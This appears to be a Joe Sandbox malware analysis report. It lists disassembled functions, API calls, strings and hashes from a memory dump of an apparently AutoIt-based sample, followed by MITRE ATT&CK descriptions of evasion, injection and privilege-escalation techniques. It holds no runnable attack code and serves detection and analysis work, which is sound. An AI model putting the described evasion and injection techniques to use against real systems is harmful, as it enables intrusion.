Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 34d3e592a6967d13bad113a4c06cd84d35fd66bb8a67934510fa948a9a0a911b
Instruction ID: f8687a7d651aa59ee82946919b0356fa596ddb440fe62a454b3f5efe8993a9b7
Opcode Fuzzy Hash: 34d3e592a6967d13bad113a4c06cd84d35fd66bb8a67934510fa948a9a0a911b
Instruction Fuzzy Hash: 0411BF71180108AFEB118F64EC80AEB376EEB45379F50C726F960932E0C779DC919752

Function 009D4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 009D4FCC

Strings

0n, xrefs: 009D4FA1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID: 0n
API String ID: 3850602802-3368625520
Opcode ID: 7c3eb54def22b65c7ebccbe12fa155a57f7214d8753fd5840261bbdd3e8c8a87
Instruction ID: 8359823c4226ec1f8d0c4429e604272bee8e2a1427fa8fc563ebfd5d11a3158b
Opcode Fuzzy Hash: 7c3eb54def22b65c7ebccbe12fa155a57f7214d8753fd5840261bbdd3e8c8a87
Instruction Fuzzy Hash: 7521D37661011AEFCB15CFA8C940CEA7BB9FB4D340B018555FA05A7320D631E961EB90

Function 009A6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

CharUpperBuffW.USER32(?,?,?), ref: 009A6CB6
_wcslen.LIBCMT ref: 009A6CC2

Strings

STOP, xrefs: 009A6CBC, 009A6CC1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 450299d9f71ad603ff4444494171a4f65c6425bc7fcfa469876eed9fcd94af3a
Instruction ID: f675a8550191548c6c5843435cb609c749e1143043fbc170c5069b197c5cbc8e
Opcode Fuzzy Hash: 450299d9f71ad603ff4444494171a4f65c6425bc7fcfa469876eed9fcd94af3a
Instruction Fuzzy Hash: FC012632A005278BCB209FFDDC809BF33B8EFA27647050924E9A2971D5EB35D900C690

Function 009590DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

0n, xrefs: 00997077, 0099709D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: 0n
API String ID: 0-3368625520
Opcode ID: 35e1a09832b3670471c34d59df1365bfecd4aefb9b5c3c12c0b399cf39d52861
Instruction ID: f7fcf88c999b5c0c9b648f2d2b387639ae8bdf8ee8e062bcb75150558bb8695d
Opcode Fuzzy Hash: 35e1a09832b3670471c34d59df1365bfecd4aefb9b5c3c12c0b399cf39d52861
Instruction Fuzzy Hash: 48115B34604604AFCB20CF69C840EA5B7AAFF99320F148619FA258B2A0CB71E941CF80

Function 009A1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009A1D4C

Strings

ComboBox, xrefs: 009A1CEB
ListBox, xrefs: 009A1D16

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1a4955e8cc79df81768509ff243351f4456508278fa8cbae23d71ca5441e69ca
Instruction ID: a0b6589b75cf36c5d3021749db28811fc6a6630f693eb76c8b2ddf318cb26a5b
Opcode Fuzzy Hash: 1a4955e8cc79df81768509ff243351f4456508278fa8cbae23d71ca5441e69ca
Instruction Fuzzy Hash: 7501D875A51218ABCB08EBA4DC55DFF77A8FB87350F044A19F876573C1EA30590886A0

Function 009A1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 009A1C46

Strings

ComboBox, xrefs: 009A1BE5
ListBox, xrefs: 009A1C10

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a08b5e047e30584a371d714e9ec45683380c4b169b4e39dd1891caad4b4089eb
Instruction ID: f54dabaefab7038ee24442432a466dd50f9f23c5424b0b35e1ea3ab2c1575a96
Opcode Fuzzy Hash: a08b5e047e30584a371d714e9ec45683380c4b169b4e39dd1891caad4b4089eb
Instruction Fuzzy Hash: 1F01A775AC110866CB04EBA0DD52EFF77BC9B53350F140419B886672C2EA249E08D6F1

Function 009A1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 009A1CC8

Strings

ComboBox, xrefs: 009A1C69
ListBox, xrefs: 009A1C94

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1daec588812e336db6355cd93afa466143c439b43ab3e142ba3ec5f0d0bb084d
Instruction ID: d189259b7f8d6337eaabf8536ed323af186d832ec2f66403b4a341989ac60e40
Opcode Fuzzy Hash: 1daec588812e336db6355cd93afa466143c439b43ab3e142ba3ec5f0d0bb084d
Instruction Fuzzy Hash: 6701ADB5A8111866CB04EBA4DA42FFF77BCAB53350F140415B88673282EA209F08C6F1

Function 009D90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0099769C,?,?,?), ref: 009D9111

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009D90F7

Strings

0n, xrefs: 009D90D6

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: 0n
API String ID: 982171247-3368625520
Opcode ID: 5ca5ece071df9b9a58d4afffbf78ad6f85c621ead3c80498e0a94d8b9de4bc10
Instruction ID: 78877da1965bebe08e22a5ab40495e8c57d7340ba53392c986f08675156143e9
Opcode Fuzzy Hash: 5ca5ece071df9b9a58d4afffbf78ad6f85c621ead3c80498e0a94d8b9de4bc10
Instruction Fuzzy Hash: 50012430248204ABEB20AF14DC49FA63BB6FF85325F00811AF9151B3E0C7326C41DB10

Function 009C747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009C7493
_wcslen.LIBCMT ref: 009C74B9

Strings

3, 3, 16, 1, xrefs: 009C7483

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 21937b116de4e131923e0de614d4dcf9891c181e999de469eac50e85b158129c
Instruction ID: a4cb4bc2c92af8e134b42bebde8f5b0ecffb3c2257f4b1168775979142134e4c
Opcode Fuzzy Hash: 21937b116de4e131923e0de614d4dcf9891c181e999de469eac50e85b158129c
Instruction Fuzzy Hash: 14E02B02A4462020A23512FAADC1F7F968FDFC5B90710182FF981C62B6EA948D9193A2

Function 009A0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009A0B23

Strings

Error allocating memory., xrefs: 009A0B1C
AutoIt, xrefs: 009A0B17

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: ad0625d797c895523382d466b4546dda226c99b4ca1e4efd45b6afeb249235a8
Instruction ID: 1bd5bbe4e247dd1d04e9ce9ea2f1689c28eab4ec746e5f04ac8f442fb057fba0
Opcode Fuzzy Hash: ad0625d797c895523382d466b4546dda226c99b4ca1e4efd45b6afeb249235a8
Instruction Fuzzy Hash: 45E0D87128430936D2143795BC03F897B848F45B61F104427FB88555C38AD2249096E9

Function 00960D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0095F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00960D71,?,?,?,0094100A), ref: 0095F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0094100A), ref: 00960D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0094100A), ref: 00960D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00960D7F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 98ad14e4583b7736b0214c6694077502d213e9e0bcb7bea322335500afb41dd0
Instruction ID: 35d247b4fba9e93244291000c34a3ce8ffbcf83b8db364420f520c901c112a18
Opcode Fuzzy Hash: 98ad14e4583b7736b0214c6694077502d213e9e0bcb7bea322335500afb41dd0
Instruction Fuzzy Hash: 5BE092B02403018BD370DFB8E4557477BE4AF54745F008A2EE592C7795DBB0E488CBA1

Function 0099D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0099D220

Strings

%.3d, xrefs: 0099D22B
X64, xrefs: 0099D2A8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: e192cf88724b2f79171b28bae818a24920efe85e79d0fc3d93a1fe2e63d5099d
Instruction ID: d2168c4a6e83b3ab2a3fdd0b8ed06781bf046d193a48e141a53dcc2c9baf07e5
Opcode Fuzzy Hash: e192cf88724b2f79171b28bae818a24920efe85e79d0fc3d93a1fe2e63d5099d
Instruction Fuzzy Hash: 6BD012A1C0A109EACF50D7E4DC859BDB37CBB18302F508C52FD26A1080D63CD548A761

Function 009D2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009D232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009D233F

Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3

Strings

Shell_TrayWnd, xrefs: 009D2325

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d5875b46105eb2e9ef20326dccdcc67ae890f06a490737f7443706cf3eebd75b
Instruction ID: 40b87621f9dba455601874e599079d58707b8b8ab5425e384abee8fa5f9173e7
Opcode Fuzzy Hash: d5875b46105eb2e9ef20326dccdcc67ae890f06a490737f7443706cf3eebd75b
Instruction Fuzzy Hash: A7D0C9763E9311B6EA64A770AC0FFC67A58AB40B14F0049167645AA1D0C9A0A841DA54

Function 009D2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009D236C
PostMessageW.USER32(00000000), ref: 009D2373

Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3

Strings

Shell_TrayWnd, xrefs: 009D2365

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ab249cbf6d38dd6cea38df731929c9df0697165c11c44fc26b041f3935118e96
Instruction ID: 8e71b255eb027708797010872c431d50f509a7661628b8667a76ac8bfa48116f
Opcode Fuzzy Hash: ab249cbf6d38dd6cea38df731929c9df0697165c11c44fc26b041f3935118e96
Instruction Fuzzy Hash: 30D0C9723DA3117AEA64A770AC0FFC67658AB45B14F4049167645AA1D0C9A0A841DA58

Function 0097BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0097BE93
GetLastError.KERNEL32 ref: 0097BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097BEFC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e5bbde7951155bdc195a9bc1979ef32cb62d0febf8df689639c2f604d3b655ea
Instruction ID: 8ede2e6271163925de59021ba8091ed702944dd4615cdf2fe0e190c3c2fa879d
Opcode Fuzzy Hash: e5bbde7951155bdc195a9bc1979ef32cb62d0febf8df689639c2f604d3b655ea
Instruction Fuzzy Hash: C441E736605216EFDF219F64CC54BBA7BA9EF41B10F14816AF96D972A1DB308D00DF50

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
